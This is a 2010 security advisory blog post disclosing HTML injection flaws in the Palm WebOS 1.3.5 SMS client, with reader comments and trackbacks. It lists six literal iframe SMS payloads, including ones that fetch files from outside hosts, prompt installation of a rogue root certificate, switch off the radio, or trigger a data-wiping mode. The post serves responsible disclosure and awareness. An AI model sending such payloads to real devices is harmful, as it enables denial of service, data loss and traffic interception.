Intrepidus Group
Insight

WebOS: Examples of SMS delivered injection flaws

Posted: April 16, 2010 – 2:59 pm | Author: | Filed under: Mobile Security

(Note: the findings herein affect WebOS 1.3.5. Palm has since released WebOS 1.4, which fixes these vulnerabilities, though not all handsets or carriers are running this version. Due to contractual agreements, the public disclosure of this information was delayed.)

Intrepidus Group has been doing mobile application security testing for over three years now, and during this time we’ve discovered and responsibly disclosed a number of vulnerabilities in Brew, Windows Mobile, BlackBerry, and iPhone applications. We have been contracted time after time to perform threat modeling, penetration testing, and various other security assessments on these platforms. So, as any one would expect, we were all looking forward to have a glance at Palm’s new WebOS platform.

While closely following the blogosphere around WebOS and reading documents released by Palm, we started to understand the revolutionary paradigm shift that Palm was attempting with WebOS. A mobile platform that functions like a web browser; a platform whose applications are written in JavaScript and HTML; and an API reference so simple that anyone reasonably familiar with web application programing could create the next revolutionary social media app in no time.

When a customer shipped us our first PRE devices to test their application, we spent spare cycles exploring the rest of WebOS. Our initial impressions were quite positive. There was just so much to love: Linux underneath, the platform’s open nature, the user interface, and the hardware. There was just so much to love. However, the honeymoon ended abruptly once we started to explore WebOS’s security posture.

As we started to pry a little it became quite apparent that Palm’s new WebOS platform was riddled with some pretty dangerous bugs. These bugs can all be traced back to that fact that WebOS is essentially a web browser and the applications are written in JavaScript and HTML. This also means that WebOS applications are subject to the numerous web applications vulnerabilities that any seasoned penetration tester would be all too familiar with. We were also quite surprised at how quickly these vulnerabilities were discovered. Within a matter of hours we started to uncover a number of low-hanging-fruit vulnerabilities that would be considered quite dangerous under even the most forgiving of standards.

We understand, of course, that there are a number of competing interests that go into the development of a new mobile platform. There are demands from share holders to get this product completed as quickly as possible. There are requirements from developers to make application development as easy as possible. There are requirements from manufacturers to make this product as cheap as possible. And there are requirements, by the (often not so popular) security oversight team, to make this product as safe as possible. We obviously do not expect Palm to focus on making the most secure of mobile platforms due to all of these competing interests. However, we feel that Palm put almost no thought into security during their development of WebOS. All of the low hanging fruit discovered should have been identified in the most basic of threat models, which should have been performed during the very early development stages of WebOS, way before any code was written. If they were, then we would imagine that slight changes to the underlying architecture of WebOS could have been implemented to protect against common web application vulnerabilities that are found in WebOS applications. Or, at the very least, common web application vulnerabilities would not have surfaced in WebOS applications written by Palm themselves.

So what vulnerabilities are we talking about? What was uncovered after a few hours of poking around? The WebOS SMS client wasn’t performing input/output validation on any SMS messages sent to the handset. This lead to a rudimentary HTML injection bug. Coupled with the fact that HTML injection leads directly to injecting code into a WebOS application, the attacks made possible were quite dangerous (especially considering they could all be delivered over a SMS message). We have produced a video demonstrating some of these possible attacks.

In this video a number of text messages were sent to the device. Leveraging the HTML injections, and some innate WebOS functionality, we were able to perform actions ranging from opening up a website by simply reading an SMS to turning off the hand set’s radio. Below is a list of the text messages we sent as well as the action they performed.

<iframe src='http://www.google.com'<>>Open the web browser and point it to google.com

<iframe src='http://webos.ath.cx:50050/bad.doc'<>>Start downloading a file using the handsets full radio bandwidth

<iframe src='http://www.archive.org/download/Peanut_Butter_Jelly_Time/pbj_512kb.mp4'<>>Start streaming a video from the internet

<iframe src='http://rajweb.net/ubercert.crt'<>>Ask the user to install a new root CA certificate

<iframe src='tel:#*#633#'<>>Turn off the handset’s radio

<iframe src='tel:#*#3366#'<>>Ask the user to enter “demo” mode, erasing all personal data on the device.

This only focuses on the SMS client of WebOS for this demonstration. The HTML injection bug may be present in a number of WebOS applications. Any app installed via the market place (even other Palm developed apps) may be vulnerable to this or other common web applications vulnerabilities. We hope that by seeing these attacks in action, WebOS application developers will know what kind of defenses they must code into their applications. We hope that by raising awareness of this threat, users will be aware of the dangers their WebOS applications can present, and that product managers will insist on security assurance testing before their offering goes live.

Both comments and trackbacks are currently closed.

22 Comments

  1. subzero
    Posted April 16, 2010 at 4:53 pm | Permalink

    This is BS. You tested a ver 1.3.5 when palm has already rolled out 1.4? Welcome to 2010.

  2. Mike
    Posted April 17, 2010 at 4:56 am | Permalink

    What version of webOS was this Pre you tested? Should I get a version of Windows XP with no service packs and run some exploits on that too?

  3. Tommy
    Posted April 17, 2010 at 5:03 am | Permalink

    Thank you for making my WebOS handset more secure and for your responsible disclosure.

  4. Posted April 18, 2010 at 4:10 pm | Permalink

    1.) It's mentioned in the video. 2.) You could try that but we are betting you would not be successful. k thx!

  5. Posted April 18, 2010 at 4:15 pm | Permalink

    are you running 1.4 and can we have your phone number?

  6. insopalm
    Posted April 18, 2010 at 5:17 pm | Permalink

    Cheers to you, Intrepidus group. I can only imagine how painful it was to withhold your 1.3.5 security findings while Palm hastily put together the 1.4 release to fix these immediate issues. How disappointing of Palm, I look forward to hearing about what has been fixed and if a responsible smartphone user is relatively safe using a WebOS device.

  7. olle
    Posted April 19, 2010 at 1:23 am | Permalink

    If iframe is possible a script tag should perhaps be possible too, this would give the attacker full access to the Palm SDK, probably with privileges of the running app. And since the sms app is most likely running in the com.palm namespace, access to the SDK with high privileges. Jikes.

  8. Someone else
    Posted April 19, 2010 at 5:32 pm | Permalink

    The possibilities for Rickrolling are endless!

  9. subzero
    Posted April 19, 2010 at 6:22 pm | Permalink

    Actually like "Tommy" said below. Thanks for making WebOS safer.

  10. Posted April 19, 2010 at 1:40 pm | Permalink

    Why isn’t the WebOS version mentioned in this article? No matter how “responsible” you might’ve been in reporting this exploit, leaving out that vital bit of information (that this vulnerability was patched and fixed MONTHS ago) is beyond irresponsible: it’s actively malicious. Please update this article.

  11. Posted April 19, 2010 at 6:52 pm | Permalink

    I love that people are showing up here to complain that Intrepidus responsibly disclosed the flaw and got their handsets patched before telling the world. Imagine screaming at an auto mechanic for pre-fixing your Toyota accelerator at no charge. "See, it doesn't work! I'm still alive!"
    P.S. Even better is the claim that you're actively exploiting handsets by not posting revision numbers. If ignorance were currency, this place would be a gold mine.

  12. Posted April 19, 2010 at 6:54 pm | Permalink

    @Newbs: fair point. We didn't mean for it ("leaving out" the version info) to come across in that manner; we were really erring on the hope that people would watch the video. While your rationale ("actively malicious") is a *bit* much, the article will get updated. Thanks for the heads up.

  13. Posted April 19, 2010 at 7:17 pm | Permalink

    *yawn* Yeah an application without input validation sure is an indication of inherent flawed security of the browser-based application model in general and the WebOS API in specific.

  14. Posted April 19, 2010 at 7:40 pm | Permalink

    Don't shoot the messenger. Nonetheless good examples, hopefully this brings some more awareness to attacks on wireless devices that utilize web applications. Good job.

  15. subzero
    Posted April 20, 2010 at 12:19 am | Permalink

    Sprint and verizon both have been updated from 1.3.5 to 1.4 (1.4.1 for sprint)

  16. Posted April 20, 2010 at 10:41 pm | Permalink

    Wow, calling 1.4 "hastily" put together is rather ignorant…

  17. Posted April 21, 2010 at 12:32 am | Permalink

    For sure ! You tell us who said that and we'll put them on our ignorant list!

  18. Posted April 22, 2010 at 4:23 pm | Permalink

    That would be "insopalm" in the comment directly above mine. You guys aren't really impressing me at all.

  19. insopalm
    Posted April 22, 2010 at 5:16 pm | Permalink

    If they didn't "hastily" put together 1.4, then Palm did their entire user community a massive disservice. Lord knows the scope and scale of fixes necessary to resolve this sort of issue – the concept that the entire phone runs as an HTML browser leaves it incredibly vulnerable to HTML injection of all sorts since Palm obviously didn't architect safeguards in their WebOS – means it wasn't enough just to do a little safecheck on SMS messages to fix everything in 1.4. This type of issue goes far deeper – a couple months of development for a patch is NOT enough time to re-architect an entire system with security that was never considered, while ensuring backwards compatibility. I can imagine it would be incredibly easy for the folks at Intrepidus to blow up your 1.4 device now that they understand the holes in the WebOS security architecture (or lack there of). Point is, WebOS as a whole was obviously rushed to market and hastily put together. It's sad because it's a revolutionary concept, but there's a reason why nobody else has gone in that direction….

  20. insopalm
    Posted April 22, 2010 at 5:29 pm | Permalink

    You obviously are not a member of the sarcasm police.

  21. Posted December 29, 2011 at 2:15 am | Permalink

    Don’t shoot the messenger. Nonetheless good examples, hopefully this brings some more awareness to attacks on wireless devices that utilize web applications. Good job.

  22. Posted July 15, 2012 at 6:35 pm | Permalink

    It is in reality a great and helpful piece of information. I am glad that you shared this helpful info with us. Please stay us up to date like this. Thank you for sharing.

25 Trackbacks

  1. [...] This post was mentioned on Twitter by iPhone or Android, Intrepidus Group. Intrepidus Group said: “WebOS: Examples of SMS delivered injection flaws” — http://bit.ly/9mmT5G [blog] ^Z [...]

  2. [...] Intrepidus Group has posted up examples of the SMS injection ’sploit, along with some pretty strong words regarding their thoughts on [...]

  3. [...] Intrepidus odkryła oraz w sposób odpowiedzialny (responsible disclosure) ujawniła szereg luk obecnych w systemie [...]

  4. [...] Hackers at the security consulting firm found that the WebOS SMS client did not properly validate input/output validation on any SMS messages sent to the handset.In a blog post, the researchers explained: [...]

  5. By Palm WebOS Hacked Via SMS Messages | JetLib News on April 19, 2010 at 12:41 pm

    [...] a slew of dangerous web app vulnerabilities. The white hat hackers found that the WebOS SMS client did not properly perform input/output validation on any SMS messages sent to the handset, leading to a rudimentary HTML injection bug. Coupled with [...]

  6. By Palm Pwned by SMS - X86ed on April 19, 2010 at 12:46 pm

    [...] official post by the researchers with video can be found here. // Tags: javascript, Palm, phone, SMS, vuln, Web Os, Windows Mobile, xss Comments RSS [...]

  7. By webOS slammed for security woes on April 19, 2010 at 3:28 pm

    [...] version of the firmware, which should limit the impact.Intrepidus Group, a mobile security group, said webOS was “riddled with some pretty dangerous bugs” due to the fact that many of its [...]

  8. By iTechJunky on April 19, 2010 at 5:33 pm

    WebOS Vulnerability SMS used as attack vector…

    // Not so long ago, we debated the end of Palm. As if the news of the Software chief resigning was not enough, today the Intrepidus Group has presented a serious attack against WebOS 1.3.5 (Because they have done a responsible vulnerability disclos……

  9. [...] more: WebOS: Examples of SMS delivered injection flaws – Intrepidus … If you enjoyed this article please consider sharing [...]

  10. [...] Intrepidus Group, a security and risk company, found a flaw in Palm’s WebOS. Due to a flaw in the way SMS is implemented on the device, the researchers were able to send a specially formed SMS message containing HTML set to execute commands. [...]

  11. By Researchers hack into Palm WebOS with text messages on April 20, 2010 at 1:48 am

    [...] input/output validation on any SMS messages sent to the handset.In a blog post, the researchers explained: This led to a rudimentary HTML injection bug. Coupled with the fact that HTML injection leads [...]

  12. By Vulnerabilidad loca en WebOS [Video] | TecnoBLog on April 20, 2010 at 6:18 pm

    [...] Intrepidus Group (vía [...]

  13. [...] researchers at the Intrepidus Group have revealed a series of HTML injection vulnerabilities in WebOS. The vulnerabilities, which were disclosed previously to Palm and have been patched, allow a [...]

  14. [...] Intrepidus odkryła oraz w sposób odpowiedzialny (responsible disclosure) ujawniła szereg luk obecnych w systemie [...]

  15. By Faille de sécurité dans Palm WebOS on April 21, 2010 at 3:34 am

    [...] La faute à WebOS qui interprête à tout va sans vérification aucune le HTML et le javascript contenu dans les SMS… oui ça craint ! Espérons que Palm fasse rapidement le nécessaire ! + d’infos ici [...]

  16. [...] – Researchers over at the Intrepidus Group published a new vulnerability for Palm WebOS devices (the Pre) that works over SMS (text messaging). These are the kinds of vulnerabilities that keep me up at night since I started using smart [...]

  17. [...] قراءة المزيد عن الثغرة من هنا Share and [...]

  18. [...] گروه امنیتی Intrepidus Group، توانستند به راحتی به سیستم عامل جدید WebOS بر روی Palm [...]

  19. By [Pre] WebOS Vulnerable To Several Attacks on April 22, 2010 at 3:25 am

    [...] from Intrepidus Group said in an advisory published on Friday last week that Palm’s WebOS operating system is subject to web [...]

  20. [...] ORIGINAL ADVISORY: Intrepidus Group: http://intrepidusgroup.com/insight/2010/04/webos-examples-of-sms-delivered-injection-flaws/ [...]

  21. By WebOS hacked via text messages | Cellular Site on May 1, 2010 at 10:28 pm

    [...] Group, a mobile security group, said webOS was “riddled with some pretty dangerous bugs” due to the fact that many of its [...]

  22. [...] article of the security risk of WEB OS sms. Not going to say Glad I got rid of my PRE ( i didnt) WebOS: Examples of SMS delivered injection flaws – Intrepidus Group – Insight When a customer shipped us our first PRE devices to test their application, we spent spare cycles [...]

  23. [...] time the security community has poked around on Palm devices. Earlier this year for example, the Intrepidus Group detailed a vulnerability impacting webOS’ SMS [...]

  24. [...] time the security community has poked around on Palm devices. Earlier this year for example, the Intrepidus Group detailed a vulnerability impacting webOS’ SMS [...]

  25. By Researchers Uncover Holes In WebOS Smartphones on December 1, 2010 at 3:34 am

    [...] by researchers. A proof-of-concept attack exploiting an email flaw was released last year, and an SMS injection flaw was demonstrated earlier this year. Source: [...]

image

This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 24399 items have been purified.